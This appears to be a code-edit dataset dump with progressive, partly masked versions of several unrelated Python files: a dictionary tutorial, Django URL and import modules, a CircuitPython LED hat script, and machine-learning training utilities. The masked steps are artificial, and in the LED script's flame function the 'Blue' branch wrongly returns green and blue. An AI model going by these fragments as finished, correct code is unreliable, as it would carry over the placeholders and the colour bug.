"step-3": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\n<mask token>\nprint(d)\n<mask token>\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\n<mask token>\nprint(d)\ndel d['eggs']\nprint(d)\n<mask token>\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\n<mask token>\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\n<mask token>\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\n<mask token>\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\n<mask token>\nprint(year_)\n<mask token>\nprint(table2[K])\n<mask token>\nprint(key)\n<mask token>\nprint(key)\n<mask token>\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\n<mask token>\nprint(rec['name'])\n<mask token>\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\n<mask token>\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\n<mask token>\ndb['bob']['jobs']\n<mask token>\nprint(age_)\n<mask token>\nprint(d)\n<mask token>\nprint(di)\n<mask token>\nprint(di)\n<mask token>\nprint(fromkeys)\n<mask token>\nprint(iterator)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d2)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(d)\n<mask token>\nprint(k)\nprint(list(k)[0])\n<mask token>\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\n<mask token>\nprint(Ks)\n<mask token>\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\n<mask token>\nfor k in sorted(Ks):\n print(k, D[k])\n",
"step-4": "<mask token>\n\n\ndef func():\n pass\n\n\nclass Main:\n\n def __init__(self):\n pass\n\n\nif __name__ == '__main__':\n pass\nd = {'name': 'Bob', 'age': 40}\nprint(d)\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\nprint(d['spam'])\nprint(d)\nprint(len(d))\nprint('ham' in d)\nprint(list(d.keys()))\nprint(list(d.values()))\nprint(list(d.items()))\nfor i in d.items():\n print(i)\nd['ham'] = ['grill', 'bake', 'fry']\nprint(d)\ndel d['eggs']\nprint(d)\nd['brunch'] = 'Bacon'\nprint(d)\nprint(list(d.values()))\nprint(list(d.keys()))\nprint(list(d.items()))\nprint(d.get('ham'))\nprint(d.get('toast'))\nprint(d.get('toast', 88))\nprint(d)\nd2 = {'toast': 4, 'muffin': 5}\nd.update(d2)\nprint(d)\nprint(d.pop('muffin'))\nprint(d.pop('toast'))\nprint(d)\ntable = {'1975': 'Holy Grail', '1979': 'Life of Brain', '1983':\n 'The Meaning of Life'}\nyear = '1983'\nmovie = table[year]\nprint(movie)\nfor year in table:\n print(year + '\\t' + table[year])\ntable2 = {'Holy Grail': '1975', 'Life of Brain': '1979',\n 'The Meaning of Life': '1983'}\nprint(table2['Holy Grail'])\nprint(list(table2.items()))\nyear_ = [title for title, year in table2.items() if year == '1975']\nprint(year_)\nK = 'Holy Grail'\nprint(table2[K])\nV = '1975'\nkey = [key for key, value in table2.items() if value == V]\nprint(key)\nkey = [key for key in table2.keys() if table2[key] == V]\nprint(key)\nMatrix = {}\nMatrix[2, 3, 4] = 88\nMatrix[7, 8, 9] = 99\nX = 2\nY = 3\nZ = 4\nz_ = Matrix[X, Y, Z]\nprint(z_)\nprint(Matrix)\nif (2, 3, 6) in Matrix:\n print(Matrix[2, 3, 6])\nelse:\n print(0)\ntry:\n print(Matrix[2, 3, 6])\nexcept KeyError:\n print(0)\nprint(Matrix.get((2, 3, 4), 0))\nprint(Matrix.get((2, 3, 6), 0))\nrec = {}\nrec['name'] = 'Bob'\nrec['age'] = 40.5\nrec['job'] = 'developer/manager'\nprint(rec['name'])\nrec = {'name': 'Bob', 'jobs': ['developer', 'manager'], 'web':\n 'www.bobs.org/?Bob', 'home': {'state': 'Overworked', 'zip': 12345}}\nprint(rec['name'])\nprint(rec['jobs'])\nprint(rec['jobs'][1])\nprint(rec['home']['zip'])\ndb = []\nother = {'name': 'other', 'jobs': ['hr', 'manager'], 'web': 'www.hr.org',\n 'home': {'state': 'Overworked', 'zip': 55555}}\ndb.append(rec)\ndb.append(other)\nprint(db[0]['jobs'])\ndb = {}\ndb['bob'] = rec\ndb['sue'] = other\ndb['bob']['jobs']\nage_ = {'name': 'Bob', 'age': 40}\nprint(age_)\nd = {}\nd['name'] = 'sue'\nd['age'] = 50\nprint(d)\ndi = dict(name='Bob', age=56)\nprint(di)\ndi = dict([('name', 'Bob'), ('age', 55)])\nprint(di)\nfromkeys = dict.fromkeys(['a', 'b'], 0)\nprint(fromkeys)\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\nprint(iterator)\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\nprint(d)\nd = {k: v for k, v in zip(['a', 'b', 'c'], [1, 2, 3])}\nprint(d)\nd = {x: (x ** 2) for x in [1, 2, 3, 4]}\nprint(d)\nd2 = {x: (x ** 2) for x in range(4)}\nprint(d2)\nd = {c: (c * 4) for c in 'SPAM'}\nprint(d)\nd = {c.lower(): (c + '!') for c in ['spam', 'eggs', 'ham']}\nprint(d)\nd = dict.fromkeys(['a', 'b', 'c'], 0)\nprint(d)\nd = {k: (0) for k in ['a', 'b', 'c']}\nprint(d)\nd = dict.fromkeys('spam')\nprint(d)\nd = dict.fromkeys('spam', 0)\nprint(d)\nd = {k: None for k in 'spam'}\nprint(d)\nd = dict(a=1, b=2, c=3)\nprint(d)\nk = d.keys()\nprint(k)\nprint(list(k)[0])\nv = d.values()\nprint(v)\nprint(list(v))\nprint(d.items())\nprint(list(d.items()))\nfor k in d.keys():\n print(k)\nfor key in d:\n print(key)\nprint(d)\nKs = d.keys()\nprint(Ks)\nKs = list(Ks)\nKs.sort()\nprint(Ks)\nfor k in Ks:\n print(k, d[k])\nprint('-------' * 6)\nD = {'b': 2, 'c': 3, 'a': 1}\nKs = D.keys()\nfor k in sorted(Ks):\n 
print(k, D[k])\n",
"step-5": "#!/usr/bin/env python3\r\n# encoding: utf-8\r\n\r\n\"\"\"\r\n@version: ??\r\n@author: ami\r\n@license: Apache Licence \r\n@file: dictTest.py\r\n@time: 2019/9/25 18:26\r\n@tools: PyCharm\r\n\"\"\"\r\n\r\n\r\ndef func():\r\n pass\r\n\r\n\r\nclass Main():\r\n def __init__(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n pass\r\n\r\nd = {'name': 'Bob', 'age': 40}\r\nprint(d)\r\n\r\nd = {'spam': 2, 'ham': 1, 'eggs': 3}\r\nprint(d['spam'])\r\nprint(d)\r\n\r\nprint(len(d))\r\nprint('ham' in d)\r\nprint(list(d.keys()))\r\nprint(list(d.values()))\r\nprint(list(d.items()))\r\n\r\nfor i in d.items():\r\n print(i)\r\n\r\nd['ham'] = ['grill', 'bake', 'fry']\r\nprint(d)\r\n\r\ndel d['eggs']\r\nprint(d)\r\nd['brunch'] = 'Bacon'\r\nprint(d)\r\n\r\nprint(list(d.values()))\r\nprint(list(d.keys()))\r\nprint(list(d.items()))\r\n\r\nprint(d.get('ham'))\r\nprint(d.get('toast'))\r\nprint(d.get('toast', 88))\r\nprint(d)\r\nd2 = {'toast': 4, 'muffin': 5}\r\nd.update(d2)\r\nprint(d)\r\nprint(d.pop('muffin'))\r\nprint(d.pop('toast'))\r\nprint(d)\r\n\r\ntable = {\r\n '1975': 'Holy Grail',\r\n '1979': 'Life of Brain',\r\n '1983': 'The Meaning of Life'\r\n}\r\nyear = '1983'\r\nmovie = table[year]\r\nprint(movie)\r\n\r\nfor year in table:\r\n print(year + '\\t' + table[year])\r\n\r\ntable2 = {\r\n 'Holy Grail': '1975',\r\n 'Life of Brain': '1979',\r\n 'The Meaning of Life': '1983'\r\n}\r\nprint(table2['Holy Grail'])\r\nprint(list(table2.items()))\r\n\r\nyear_ = [title for (title, year) in table2.items() if year == '1975']\r\nprint(year_)\r\n\r\nK = 'Holy Grail'\r\nprint(table2[K])\r\nV = '1975'\r\nkey = [key for (key, value) in table2.items() if value == V]\r\nprint(key)\r\nkey = [key for key in table2.keys() if table2[key] == V]\r\nprint(key)\r\n\r\nMatrix = {}\r\nMatrix[(2, 3, 4)] = 88\r\nMatrix[(7, 8, 9)] = 99\r\nX = 2\r\nY = 3\r\nZ = 4\r\nz_ = Matrix[(X, Y, Z)]\r\nprint(z_)\r\nprint(Matrix)\r\n\r\nif (2, 3, 6) in Matrix:\r\n print(Matrix[(2, 3, 6)])\r\nelse:\r\n print(0)\r\n\r\ntry:\r\n print(Matrix[(2, 3, 6)])\r\nexcept KeyError:\r\n print(0)\r\n\r\nprint(Matrix.get((2, 3, 4), 0))\r\nprint(Matrix.get((2, 3, 6), 0))\r\n\r\nrec = {}\r\nrec['name'] = 'Bob'\r\nrec['age'] = 40.5\r\nrec['job'] = 'developer/manager'\r\nprint(rec['name'])\r\n\r\nrec = {\r\n 'name': 'Bob',\r\n 'jobs': ['developer', 'manager'],\r\n 'web': 'www.bobs.org/?Bob',\r\n 'home': {'state': 'Overworked', 'zip': 12345}\r\n}\r\nprint(rec['name'])\r\nprint(rec['jobs'])\r\nprint(rec['jobs'][1])\r\nprint(rec['home']['zip'])\r\ndb = []\r\nother = {\r\n 'name': 'other',\r\n 'jobs': ['hr', 'manager'],\r\n 'web': 'www.hr.org',\r\n 'home': {'state': 'Overworked', 'zip': 55555}\r\n}\r\ndb.append(rec)\r\ndb.append(other)\r\nprint(db[0]['jobs'])\r\n\r\ndb = {}\r\ndb['bob'] = rec\r\ndb['sue'] = other\r\ndb['bob']['jobs']\r\n\r\nage_ = {'name': 'Bob', 'age': 40}\r\nprint(age_)\r\n\r\nd = {}\r\nd['name'] = 'sue'\r\nd['age'] = 50\r\nprint(d)\r\n\r\ndi = dict(name='Bob', age=56)\r\nprint(di)\r\n\r\ndi = dict([('name', 'Bob'), ('age', 55)])\r\nprint(di)\r\n\r\nfromkeys = dict.fromkeys(['a', 'b'], 0)\r\nprint(fromkeys)\r\n\r\niterator = zip(['a', 'b', 'c'], [1, 2, 3])\r\nprint(iterator)\r\nd = dict(zip(['a', 'b', 'c'], [1, 2, 3]))\r\nprint(d)\r\n\r\nd = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}\r\nprint(d)\r\n\r\nd = {x: x ** 2 for x in [1, 2, 3, 4]}\r\nprint(d)\r\nd2 = {x: x ** 2 for x in range(4)}\r\nprint(d2)\r\n\r\nd = {c: c * 4 for c in 'SPAM'}\r\nprint(d)\r\n\r\nd = {c.lower(): c + '!' 
for c in ['spam', 'eggs', 'ham']}\r\nprint(d)\r\n\r\nd = dict.fromkeys(['a', 'b', 'c'], 0)\r\nprint(d)\r\n\r\nd = {k: 0 for k in ['a', 'b', 'c']}\r\nprint(d)\r\n\r\nd = dict.fromkeys('spam')\r\nprint(d)\r\nd = dict.fromkeys('spam', 0)\r\nprint(d)\r\n\r\nd = {k: None for k in 'spam'}\r\nprint(d)\r\n\r\nd = dict(a=1, b=2, c=3)\r\nprint(d)\r\nk = d.keys()\r\nprint(k)\r\n# print(k[0])\r\nprint(list(k)[0])\r\nv = d.values()\r\nprint(v)\r\nprint(list(v))\r\nprint(d.items())\r\nprint(list(d.items()))\r\n\r\nfor k in d.keys(): print(k)\r\n\r\nfor key in d: print(key)\r\n\r\n# 排序{'a': 1, 'b': 2, 'c': 3}\r\nprint(d)\r\nKs = d.keys()\r\nprint(Ks)\r\nKs = list(Ks)\r\nKs.sort()\r\nprint(Ks)\r\nfor k in Ks: print(k, d[k])\r\n\r\nprint(\"-------\"*6)\r\nD = {'b': 2, 'c': 3, 'a': 1}\r\nKs = D.keys()\r\nfor k in sorted(Ks): print(k, D[k])\r\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from django.conf.urls import url
#from .views import CommandReceiveView
from .views import index, send_message
urlpatterns = [
#url(r'^bot/(?P<bot_token>.+)/$', CommandReceiveView.as_view(), name='command'),
url(r'^send_message$', send_message, name='send_message'),
url(r'^$', index, name='index'),
]
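# For orientation only — hypothetical stubs for the imported views; the real
# implementations live in .views and may differ:
#
# def index(request):
#     return render(request, 'index.html')
#
# def send_message(request):
#     ...  # e.g. relay the posted text to the bot API, then return an HttpResponse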
|
normal
|
{
"blob_id": "6cc56f73e58366a3906da537cc27fdd5a066ee34",
"index": 2647,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^send_message$', send_message, name='send_message'),\n url('^$', index, name='index')]\n",
"step-3": "from django.conf.urls import url\nfrom .views import index, send_message\nurlpatterns = [url('^send_message$', send_message, name='send_message'),\n url('^$', index, name='index')]\n",
"step-4": "from django.conf.urls import url\n\n#from .views import CommandReceiveView\nfrom .views import index, send_message\n\nurlpatterns = [\n #url(r'^bot/(?P<bot_token>.+)/$', CommandReceiveView.as_view(), name='command'),\n url(r'^send_message$', send_message, name='send_message'),\n url(r'^$', index, name='index'),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from django.db import models
from django.db.models import F, Q, Sum, Avg
from django.db import transaction
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.sites.models import Site
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.template.loader import render_to_string
from datetime import datetime, timedelta, date
<|reserved_special_token_1|>
# coding=UTF-8
#!/usr/bin/env python
# for models.py
from django.db import models
from django.db.models import F, Q, Sum, Avg
from django.db import transaction
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.sites.models import Site
# from apps.router.models import User
# from django.contrib.auth.models import Message
# from django.contrib import messages  # TODO: wangqi 20150521 Message seems unused; if it is needed, replace it with the messages framework
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from django.template.loader import render_to_string
from datetime import datetime, timedelta, date
# from apps.common.utils.utils_collection import *
# from apps.common.utils.utils_datetime import *
# from apps.common.utils.utils_mysql import *
# from apps.common.utils.utils_number import *
# from apps.common.utils.utils_render import *
# from apps.common.biz_utils.utils_sorter import *
# from apps.common.utils.utils_string import *
# from apps.common.biz_utils.utils_misc import *
# from apilib import *
# from apilib import tsapi
|
flexible
|
{
"blob_id": "d551cab1856fbdb91918f9171d5c02b8dab84aba",
"index": 8223,
"step-1": "<mask token>\n",
"step-2": "from django.db import models\nfrom django.db.models import F, Q, Sum, Avg\nfrom django.db import transaction\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.sites.models import Site\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template.loader import render_to_string\nfrom datetime import datetime, timedelta, date\n",
"step-3": "# coding=UTF-8\n#!/usr/bin/env python\n\n# for models.py\nfrom django.db import models\nfrom django.db.models import F, Q, Sum, Avg\nfrom django.db import transaction\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.sites.models import Site\n# from apps.router.models import User\n# from django.contrib.auth.models import Message\n# from django.contrib import messages TODO: wangqi 20150521 Message�ƺ�û�õ��ˣ����Ҫ�������������滻\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.template.loader import render_to_string\nfrom datetime import datetime, timedelta, date\n\n# from apps.common.utils.utils_collection import *\n# from apps.common.utils.utils_datetime import *\n# from apps.common.utils.utils_mysql import *\n# from apps.common.utils.utils_number import *\n# from apps.common.utils.utils_render import *\n# from apps.common.biz_utils.utils_sorter import *\n# from apps.common.utils.utils_string import *\n# from apps.common.biz_utils.utils_misc import *\n# from apilib import *\n# from apilib import tsapi\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def wheeln(pos, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 0 or pos > 255:
return 0, 0, 0
if pos < 85:
return int(255 - pos * 3), int(pos * 3), 0
elif pos < 170:
pos -= 85
return 0, int(255 - pos * 3), int(pos * 3)
else:
pos -= 170
return int(pos * 3), 0, int(255 - pos * 3)
def randcolor():
randgr = randrd = randbl = 0
if random.randint(0, 14) == 1:
if random.randint(0, 1) == 1:
randgr = random.randint(1, 255)
if random.randint(0, 1) == 1:
randrd = random.randint(1, 255)
if random.randint(0, 1) == 1:
randbl = random.randint(1, 255)
return randgr, randrd, randbl
def flame(pos, clr, sft):
if pos + sft > 255:
pos = pos + sft - 256
else:
pos = pos + sft
if pos < 32:
rval = 0
elif pos > 31 and pos < 64:
rval = int(pos * 8 - 249)
elif pos > 63 and pos < 96:
rval = int(767 - pos * 8)
elif pos > 95 and pos < 128:
rval = 0
elif pos > 127 and pos < 160:
rval = int(pos * 8 - 1017)
elif pos > 159 and pos < 192:
rval = int(1535 - pos * 8)
elif pos > 191 and pos < 224:
rval = 0
elif pos > 223:
rval = 0
if clr == 0:
return rval, 0, 0
elif clr == 1:
return rval, rval, 0
elif clr == 2:
return 0, rval, 0
elif clr == 3:
return 0, rval, rval
elif clr == 4:
# My Godzilla Hat Code - @alt_bier
from adafruit_circuitplayground.express import cpx
import random
#cpx.pixels.brightness = 0.5 # 50 pct
cpx.pixels.fill((0, 0, 0)) # Turn off the NeoPixels if they're on!
# Function to give us a nice color swirl on the built in NeoPixel (R,G,B)
def wheeln(pos, sft):
if (pos + sft) > 255:
pos = (pos + sft) - 256
else:
pos = (pos + sft)
if (pos < 0) or (pos > 255):
return (0, 0, 0)
if pos < 85:
return (int(255 - pos*3), int(pos*3), 0)
elif pos < 170:
pos -= 85
return (0, int(255 - (pos*3)), int(pos*3))
else:
pos -= 170
return (int(pos*3), 0, int(255 - pos*3))
# Function to flash random colors
def randcolor():
randgr = randrd = randbl = 0
# determine if all colors off
if (random.randint(0,14) == 1):
# if on then determine if each color is off and return an intensity value if on
if (random.randint(0,1) == 1):
randgr = random.randint(1,255)
if (random.randint(0,1) == 1):
randrd = random.randint(1,255)
if (random.randint(0,1) == 1):
randbl = random.randint(1,255)
return (randgr, randrd, randbl)
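# Note: the randint(0, 14) == 1 gate passes on about 1 in 15 calls, so most
# pixels stay dark each frame; and since all three channels are independent
# random draws, the g/r/b ordering of the variables does not change the effect.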
# Function to simulate a flame effect on built in NeoPixel (R,G,B)
def flame(pos, clr, sft):
# pos = position, sft = shift
if (pos + sft) > 255:
pos = (pos + sft) - 256
else:
pos = (pos + sft)
#
# RETURN VALUES
if pos < 32:
# OFF
rval = 0
elif (pos > 31) and (pos < 64):
# Low-High
rval = int((pos*8) - 249)
elif (pos > 63) and (pos < 96):
# High-Low
rval = int(767 - (pos*8))
elif (pos > 95) and (pos < 128):
# OFF
rval = 0
elif (pos > 127) and (pos < 160):
# Low-High
rval = int((pos*8) - 1017)
elif (pos > 159) and (pos < 192):
# High-Low
rval = int(1535 - (pos*8))
elif (pos > 191) and (pos < 224):
# OFF
rval = 0
elif (pos > 223):
# OFF
rval = 0
#
# RETURN COLOR
if (clr == 0):
# Red
return (rval, 0, 0)
elif (clr == 1):
# Red & Green
return (rval, rval, 0)
elif (clr == 2):
# Green
return (0, rval, 0)
elif (clr == 3):
# Green & Blue
return (0, rval, rval)
elif (clr == 4):
# Blue
        return (0, 0, rval)
elif (clr == 5):
# Blue & Red
return (rval, 0, rval)
else:
return (0, 0, 0)
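# Note: the ladder above yields two triangular brightness pulses per 256-step
# cycle (positions 32-95 and 128-191), which reads as a flicker on the ring.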
# Function to turn off all the built in NeoPixels
def alloff():
cpx.pixels.fill((0, 0, 0))
mode = 1
pusha = 0
pushb = 0
clr = 0
i = 0
while True:
# NeoPixels are cpx.pixels[0-9]
if (mode == 1):
cpx.pixels[0] = flame(i, clr, 32)
cpx.pixels[1] = flame(i, clr, 24)
cpx.pixels[2] = flame(i, clr, 16)
cpx.pixels[3] = flame(i, clr, 8)
cpx.pixels[4] = flame(i, clr, 0)
cpx.pixels[5] = flame(i, clr, 0)
cpx.pixels[6] = flame(i, clr, 8)
cpx.pixels[7] = flame(i, clr, 16)
cpx.pixels[8] = flame(i, clr, 24)
cpx.pixels[9] = flame(i, clr, 32)
elif (mode == 2):
cpx.pixels[0] = wheeln(i, 0)
cpx.pixels[1] = wheeln(i, 24)
cpx.pixels[2] = wheeln(i, 48)
cpx.pixels[3] = wheeln(i, 72)
cpx.pixels[4] = wheeln(i, 96)
cpx.pixels[5] = wheeln(i, 120)
cpx.pixels[6] = wheeln(i, 144)
cpx.pixels[7] = wheeln(i, 168)
cpx.pixels[8] = wheeln(i, 192)
cpx.pixels[9] = wheeln(i, 216)
elif (mode == 3):
cpx.pixels[0] = randcolor()
cpx.pixels[1] = randcolor()
cpx.pixels[2] = randcolor()
cpx.pixels[3] = randcolor()
cpx.pixels[4] = randcolor()
cpx.pixels[5] = randcolor()
cpx.pixels[6] = randcolor()
cpx.pixels[7] = randcolor()
cpx.pixels[8] = randcolor()
cpx.pixels[9] = randcolor()
else:
# Mode = 0 so turn All Off
alloff()
# Button A is bottom button on hat
if cpx.button_a:
print("Button A on Bottom Pressed! Changing mode to ALL OFF.")
pusha = 1
# Button B is top button on hat
if cpx.button_b:
print("Button B on Top Pressed! Changing mode.")
pushb = 1
i = (i+1) % 256
#print (i)
if (i == 255):
clr = (clr+1) % 6
if ((i == 63) | (i == 127) | (i == 191) | (i >= 255)) and (pusha == 1):
mode = 0
pusha = 0
i = 0
if ((i == 63) | (i == 127) | (i == 191) | (i >= 255)) and (pushb == 1):
mode = (mode+1)
pushb = 0
i = 0
if (mode > 3):
mode = 1
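# --- Example extension (editor sketch, not part of the original code) ---
# One way to add a fourth "chase" mode that walks a single wheel-colored pixel
# around the ring (the mode number and placement here are illustrative):
#
#     elif (mode == 4):
#         alloff()
#         cpx.pixels[i % 10] = wheeln(i, 0)
#
# with the wrap at the bottom raised to `if (mode > 4): mode = 1`.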
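# Training utilities - seeding, metrics, early stopping, timing, logging and CV bookkeeping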
import os, random
from time import time
import pickle
import numpy as np
from sklearn.metrics import log_loss, f1_score, accuracy_score
from IPython.display import clear_output
import torch
from transformers import AutoTokenizer
def seed_everything(seed):
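    """Seed Python, NumPy and PyTorch RNGs (CPU and CUDA) and make cuDNN
    deterministic, so runs are reproducible."""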
print(f'Set seed to {seed}.')
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
if torch.cuda.is_available():
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
def is_blackbone(n):
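    """True if a parameter name belongs to the pretrained backbone (here,
    anything named 'model.*'); presumably used to give backbone and head
    different optimizer settings."""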
return n.startswith('model')
def evaluation(ytrue, y_pred, labels=[0,1,2,3]):
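    """Score class-probability predictions: log-loss, weighted F1 and accuracy."""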
log = log_loss(ytrue, y_pred, labels=labels)
f1 = f1_score(ytrue, y_pred.argmax(1), average='weighted')
acc = accuracy_score(ytrue, y_pred.argmax(1))
return {'Logloss': log, 'F1': f1, 'Acc': acc}
def getTokenizer(model_config, tok_name):
return AutoTokenizer.from_pretrained(tok_name, config=model_config, add_prefix_space=False)
class EarlyStopping:
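    """Set `stop` after `patience` consecutive non-improving updates of the
    monitored score; mode 'max' means higher is better, 'min' lower."""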
def __init__(self, patience=5, mode='max'):
self.step = 0
self.stop = False
        self.score = -float('inf') if mode=='max' else float('inf')
self.patience = patience
self.mode = mode
self.mult = 1 if mode=='max' else -1
def update(self, score):
if self.mult*(self.score-score) > 0:
self.step += 1
else:
self.step = 0
self.score = score
if self.step == self.patience:
self.stop = True
class Timer:
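    """Simple wall-clock timer; the first read of `.time` freezes it and
    returns the elapsed seconds."""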
def __init__(self):
self._time = 0
self.is_stopped = False
self._start()
def _start(self):
self._time = time()
def _stop(self):
if not self.is_stopped:
self.is_stopped = True
self._time = time()-self._time
@property
def time(self):
self._stop()
return self._time
def to_string(self):
return "{:02d}:{:02d}".format(*self.m_s())
def m_s(self):
t = round(self.time)
s = t%60
m = t//60
return m,s
class Printer:
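    """Accumulates one formatted log line per epoch and redraws them all
    (clearing the cell output) for the current fold."""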
def __init__(self, fold=0):
self._print = []
self.fold = fold
def pprint(self, **kwargs):
str_log = "\r"
for key in kwargs.keys():
str_log += "{}: {} - ".format(key, kwargs[key])
print(str_log, end='')
def update(self, epoch, losses, scores, time = None):
str_log = f"⏰ {time} | " if time else ""
str_log += "Epoch: {} - Loss: {:.5f} - ValLoss: {:.5f}".format(epoch, losses['loss'][epoch], losses['val_loss'][epoch])
for metric_name, value in scores.items():
str_log += ' - {}: {:.5f}'.format(metric_name, value)
self._print.append(str_log)
def show(self):
clear_output()
print("_"*100, "\nFold ", self.fold)
for p in self._print:
print("_" * 100)
print('| '+ p)
def update_and_show(self, epoch, losses, score, time=None):
self.update(epoch, losses, score, time)
self.show()
class WorkplaceManager:
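    """Seeds RNGs and resets the workspace: old directories are wiped only if a
    previous run left `n_folds` models behind, files matching the given
    extensions are deleted, and the directories are recreated. Relies on
    `rm -r` via os.system, so it assumes a POSIX shell."""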
def __init__(self, seed, dirs, exts, n_fols=10):
self.seed = seed
self.dirs = dirs
self.exts = exts
self.n_folds = n_fols
self._set_workplace()
@staticmethod
def create_dir(dir):
os.makedirs(dir, exist_ok=True)
def _create_dirs(self):
print('Created {}'.format(' '.join(self.dirs)))
for d in self.dirs:
self.create_dir(d)
def _clear_dirs(self):
print('Deleted {}'.format(' '.join(self.dirs)))
self.clear([f'{d}*' for d in self.dirs])
def _clear_files(self):
print('Deleted {}'.format(' '.join(self.exts)))
self.clear([f'*{ext}' for ext in self.exts])
def clear(self, objs_name):
os.system('rm -r {}'.format(' '.join(objs_name)))
def _set_workplace(self):
seed_everything(self.seed)
if os.path.exists('models') and len(os.listdir('models/')) == self.n_folds:
self._clear_dirs()
self._clear_files()
self._create_dirs()
class CrossValLogger:
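    """Stitches the per-fold eval predictions back together and compares the
    mean OOF CV score (loaded from `oof_cv`, presumably a running sum of
    per-fold scores) with the overall score on the stitched predictions."""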
def __init__(self, df, metric_name, n_folds=10, oof_cv = 'cv_score.pkl', path='evals/roberta-base/'):
        assert df.fold.nunique()==n_folds, "Inconsistency between df.fold.nunique() and n_folds"
self.df = df.copy()
self.metric_name = metric_name
self.path = path
self.n_folds = n_folds
self.oof_cv = oof_cv
self.score1, self.score2 = None, None
def _retrieve_eval_preds(self):
ph = self.path+'fold_{}_best_eval.npy'
shape = ( self.df.shape[0], self.df.label.nunique() )
preds = np.empty(shape, dtype=np.float32)
for i in self.df.fold.unique():
index = self.df[self.df.fold==i].index.values
fold_pred = np.load(ph.format(i))
preds[index] = fold_pred[:, :]
return preds
def _load_oof_cv_score(self):
score = 0
with open(self.oof_cv, 'rb') as f:
score = pickle.load(f)
return score
def show_results(self, return_score=False):
if self.score1 is None:
eval_preds = self._retrieve_eval_preds()
self.score1 = self._load_oof_cv_score() / self.n_folds #oof_cv_scores
self.score2 = evaluation(self.df.label.values, eval_preds, labels=self.df.label.unique())[self.metric_name] #ovr_score
print('OOF_CV_SCORE: {:.5f} | OVR_SCORE: {:.5f}'.format(self.score1, self.score2))
        if return_score:
            return self.score1, self.score2
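# --- Usage sketch (editor addition, not from the original source) ---
# Minimal illustration of the early-stopping and timing helpers; the score
# sequence below is made up.
if __name__ == '__main__':
    timer = Timer()
    stopper = EarlyStopping(patience=2, mode='max')
    for epoch, val_f1 in enumerate([0.61, 0.64, 0.63, 0.62]):
        stopper.update(val_f1)
        if stopper.stop:
            print('Stopping at epoch {}; best F1 = {:.2f}'.format(epoch, stopper.score))
            break
    print('Elapsed:', timer.to_string())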
os.system('rm -r {}'.format(' '.join(objs_name)))\n\n def _set_workplace(self):\n seed_everything(self.seed)\n if os.path.exists('models') and len(os.listdir('models/')) == self.n_folds:\n self._clear_dirs()\n self._clear_files() \n self._create_dirs()\n\n\nclass CrossValLogger:\n def __init__(self, df, metric_name, n_folds=10, oof_cv = 'cv_score.pkl', path='evals/roberta-base/'):\n assert df.fold.nunique()==n_folds, \"Unconsistency between df.n_folds and n_folds\"\n\n self.df = df.copy()\n self.metric_name = metric_name\n self.path = path\n self.n_folds = n_folds\n self.oof_cv = oof_cv\n self.score1, self.score2 = None, None\n\n def _retrieve_eval_preds(self):\n ph = self.path+'fold_{}_best_eval.npy'\n shape = ( self.df.shape[0], self.df.label.nunique() )\n preds = np.empty(shape, dtype=np.float32)\n for i in self.df.fold.unique():\n index = self.df[self.df.fold==i].index.values\n fold_pred = np.load(ph.format(i))\n preds[index] = fold_pred[:, :]\n return preds\n\n def _load_oof_cv_score(self):\n score = 0\n with open(self.oof_cv, 'rb') as f:\n score = pickle.load(f)\n f.close()\n return score\n\n def show_results(self, return_score=False):\n if self.score1 is None:\n eval_preds = self._retrieve_eval_preds()\n self.score1 = 